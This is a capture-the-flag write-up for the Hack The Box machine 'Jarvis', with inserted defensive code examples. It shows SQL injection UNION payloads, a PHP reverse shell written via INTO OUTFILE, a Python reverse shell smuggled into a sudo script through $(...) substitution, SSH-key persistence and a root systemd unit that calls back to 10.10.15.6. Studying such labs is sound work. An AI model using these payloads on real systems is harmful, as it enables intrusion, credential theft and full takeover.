Hack the box: Jarvis

Recon

# nmap -sS -sV -n -O 10.10.10.143
Starting Nmap 7.70
-- snip --
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 ((Debian))
-- snip --
# dirb http://10.10.10.143/ /usr/share/wordlists/dirb/common.txt -R
-- snip --
URL_BASE: http://10.10.10.143/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
OPTION: Interactive Recursion
-- snip --
==> DIRECTORY: http://10.10.10.143/css/
==> DIRECTORY: http://10.10.10.143/fonts/
==> DIRECTORY: http://10.10.10.143/images/
+ http://10.10.10.143/index.php (CODE:200|SIZE:23628)
==> DIRECTORY: http://10.10.10.143/js/
==> DIRECTORY: http://10.10.10.143/phpmyadmin/

SQL injection in /room.php?cod

1 ORDER BY 7
Injected, working query
1 ORDER BY 8
Injected, broken query
0 UNION ALL SELECT 1,2,3,4,5,6,7
Numbered columns
0 UNION ALL SELECT 1,user,3,password,host,6,7 FROM mysql.user
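The probes above work because the value of `cod` is spliced straight into the SQL text. The following added example (not code from the original write-up or the box) reproduces that pattern against an in-memory SQLite table and puts the fixed version next to it: the room code is allow-listed as a decimal integer and then bound as a parameter, so the same UNION payload is rejected before it reaches the database. Table and column names are assumptions; only the column count (seven) is known from the ORDER BY probes, and the local `user` table stands in for `mysql.user`.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the lookup behind /room.php?cod.
# Schema is an assumption; the real table is only known to have seven columns.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE room(cod INTEGER, name TEXT, price INTEGER, stars INTEGER,
                          image TEXT, thumb TEXT, descr TEXT);
        INSERT INTO room VALUES (1, 'Room A', 120, 3, 'a.jpg', 'a_s.jpg', 'constructed');
        INSERT INTO room VALUES (2, 'Room B', 250, 5, 'b.jpg', 'b_s.jpg', 'constructed');
        -- stands in for mysql.user; the hash is a constructed placeholder
        CREATE TABLE user(user TEXT, password TEXT, host TEXT);
        INSERT INTO user VALUES ('dbuser', 'constructed-hash', 'localhost');
    """)
    return conn

def vulnerable_lookup(conn, cod):
    """The pattern behind the finding: the request parameter becomes SQL text."""
    return conn.execute("SELECT * FROM room WHERE cod=" + cod).fetchall()

def validate_cod(cod):
    """Allow-list check: a room code is a short unsigned decimal integer."""
    return re.fullmatch(r"[0-9]{1,9}", cod) is not None

def safe_lookup(conn, cod):
    """Validate first, then bind the value; it is never parsed as SQL."""
    if not validate_cod(cod):
        raise ValueError("cod must be a positive integer")
    return conn.execute("SELECT * FROM room WHERE cod=?", (int(cod),)).fetchall()

# The write-up's UNION payload, with mysql.user replaced by the local stand-in.
PAYLOAD = "0 UNION ALL SELECT 1,user,3,password,host,6,7 FROM user"

if __name__ == "__main__":
    db = build_db()
    # The credential row comes back as if it were a room record.
    print(vulnerable_lookup(db, PAYLOAD))
    try:
        safe_lookup(db, PAYLOAD)
    except ValueError as e:
        print("rejected:", e)
```

The later INTO OUTFILE step additionally depends on the application's database account holding the FILE privilege and on the web root being writable by the MySQL server process. Not granting FILE to the web application's account, and pointing `secure_file_priv` at a dedicated directory (or setting it to NULL to disable file export entirely), removes that write even where an injection remains.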

Reversing password

Reverse shell

SELECT
"<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/10.10.15.6/443 0>&1'\"); ?>"
INTO OUTFILE "/var/www/html/images/revshell.php"
# nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.15.6] from (UNKNOWN) [10.10.10.143] 57252
bash: cannot set terminal process group (605): Inappropriate ioctl for device
bash: no job control in this shell
www-data@jarvis:/var/www/html/images$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@jarvis:/var/www/html/images$

Escalate to user

www-data@jarvis:/home/pepper$ stat user.txt
stat user.txt
File: user.txt
Size: 33 Blocks: 8 IO Block: 4096 regular file
Device: 801h/2049d Inode: 655369 Links: 1
Access: (0440/-r--r-----) Uid: ( 0/ root) Gid: ( 1000/ pepper)
Access: 2019-03-05 07:40:37.871997828 -0500
Modify: 2019-03-05 07:11:01.000000000 -0500
Change: 2019-03-05 07:26:01.727994624 -0500
Birth: -
www-data@jarvis:/home/pepper$ sudo -ll
sudo -ll
Matching Defaults entries for www-data on jarvis:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on jarvis:
Sudoers entry:
RunAsUsers: pepper
RunAsGroups: ALL
Options: !authenticate
Commands:
/var/www/Admin-Utilities/simpler.py
import os

def exec_ping():
    # Blocklist of shell metacharacters; anything not listed here still reaches the shell.
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    # The input is concatenated into a shell command line.
    os.system('ping ' + command)
echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.15.6',1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);" > /tmp/revshell.py
sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
Enter an IP: $(python /tmp/revshell.py)
# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.15.6] from (UNKNOWN) [10.10.10.143] 48254
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(pepper) gid=1000(pepper) groups=1000(pepper)
$ cat /home/pepper/user.txt
2afa...
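The sudo rule runs simpler.py as pepper without a password, and the script's blocklist stops `;`, `|`, `&` and backticks but not `$(...)`, which is why the command substitution above goes through. The following added example (mine, not the script from the box) puts the original check next to a hardened form: the input is parsed as an IP address with the standard library, and ping is started from an argv list with no shell, so there is no command line for any metacharacter to act on. `FORBIDDEN` is copied from simpler.py; the function names and the `-c 1` argument are my choices.

```python
import ipaddress
import subprocess

# The blocklist from simpler.py, reproduced only to show what it lets through.
FORBIDDEN = ['&', ';', '-', '`', '||', '|']

def original_filter_allows(command):
    """True when simpler.py's check would let the string reach os.system()."""
    return not any(token in command for token in FORBIDDEN)

def is_valid_target(target):
    """Positive validation: the input must parse as an IPv4 or IPv6 address."""
    try:
        ipaddress.ip_address(target.strip())
        return True
    except ValueError:
        return False

def build_ping_argv(target):
    """Hardened form: validate, then build an argv list. No shell is involved,
    so command substitution, pipes and separators in the input are inert."""
    if not is_valid_target(target):
        raise ValueError("not an IP address")
    ip = ipaddress.ip_address(target.strip())
    return ["ping", "-c", "1", str(ip)]

def exec_ping_hardened(target):
    """Run the validated ping and return its exit status (not exercised offline)."""
    argv = build_ping_argv(target)
    return subprocess.run(argv, capture_output=True, text=True, timeout=10).returncode

if __name__ == "__main__":
    for candidate in ["10.10.10.143", "127.0.0.1;id", "$(id)"]:
        print(candidate, "| blocklist allows:", original_filter_allows(candidate),
              "| parses as IP:", is_valid_target(candidate))
```

The point of the comparison is that the blocklist answers "does this string contain something I thought of?", while `ipaddress.ip_address` answers "is this string exactly the thing I expect?"; only the second question has a closed answer.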

Securing user shell

$ echo "ssh-rsa AAAAB3..." >> /home/pepper/.ssh/authorized_keys
# ssh pepper@10.10.10.143 -c aes256-ctr -i id_rsa

Privilege escalation

$ python linuxprivchecker.py
-- snip --
[+] SUID/SGID Files and Directories
-rwsr-x--- 1 root pepper 174520 Feb 17 2019 /bin/systemctl
-- snip --
[Unit]
Description=Revshell
After=network.target

[Service]
Type=simple
Restart=always
RestartSec=1
User=root
ExecStart=/usr/bin/env python /home/pepper/tellico/revshell.py
ExecStop=/bin/echo done

[Install]
WantedBy=multi-user.target
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.15.6',1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);
pepper@jarvis:~/tellico$ systemctl enable /home/pepper/tellico/revshell.service
pepper@jarvis:~/tellico$ systemctl start revshell.service
# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.15.6] from (UNKNOWN) [10.10.10.143] 53020
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
sqli_defender.py
# cat root.txt
d41...
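The root step rests on a single misconfiguration: /bin/systemctl is setuid root and executable by the pepper group, so any unit file the user can point it at runs as root. The following added example (not part of the write-up) is the audit a defender would run over setuid/setgid listings of the kind linuxprivchecker prints: it parses `ls -l` style lines, compares each privileged binary against a known-good baseline, and separately flags setuid-root files whose group is an ordinary user. The sample listing and baseline are constructed; only the /bin/systemctl line reproduces the finding shown above.

```python
from dataclasses import dataclass

# Constructed sample in the ls -l format linuxprivchecker reports. The
# /bin/systemctl line is the finding from the box; the other entries are
# assumed, typical setuid/setgid binaries used to show what a baseline passes.
SAMPLE_LISTING = """\
-rwsr-xr-x 1 root root 140944 Jun 5 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 59680 May 17 2017 /usr/bin/passwd
-rwsr-x--- 1 root pepper 174520 Feb 17 2019 /bin/systemctl
-rwxr-sr-x 1 root shadow 40504 May 17 2017 /sbin/unix_chkpwd
-rwxr-xr-x 1 root root 9432 Feb 17 2019 /usr/bin/env
"""

# Constructed baseline: the privileged binaries this host is expected to carry.
BASELINE = {"/usr/bin/sudo", "/usr/bin/passwd", "/sbin/unix_chkpwd"}

@dataclass
class Finding:
    path: str
    owner: str
    group: str
    reason: str

def parse_line(line):
    """Split one ls -l line into (perms, owner, group, path); None if malformed."""
    parts = line.split(None, 8)
    if len(parts) != 9:
        return None
    perms, _links, owner, group, _size, _mon, _day, _year, path = parts
    return perms, owner, group, path

def audit(listing, baseline):
    """Return a Finding for each setuid/setgid file that is off-baseline or
    is setuid root yet runnable by a non-root group."""
    findings = []
    for line in listing.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        perms, owner, group, path = parsed
        setuid = perms[3] in "sS"      # owner execute slot carries the setuid bit
        setgid = perms[6] in "sS"      # group execute slot carries the setgid bit
        if not (setuid or setgid):
            continue
        reasons = []
        if path not in baseline:
            reasons.append("not in baseline")
        if setuid and owner == "root" and group != "root" and perms[6] in "xs":
            reasons.append(f"setuid root but executable by group '{group}'")
        if reasons:
            findings.append(Finding(path, owner, group, "; ".join(reasons)))
    return findings

if __name__ == "__main__":
    for f in audit(SAMPLE_LISTING, BASELINE):
        print(f"{f.path}: {f.reason}")
```

Run against a real host, the listing would come from `find / -perm /6000 -type f -exec ls -l {} +` and the baseline from a clean install of the same release; the second check matters even for baselined files, since a package-shipped binary re-owned to a user group is exactly what turned systemctl into a root shell here.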

Tellico Lungrevink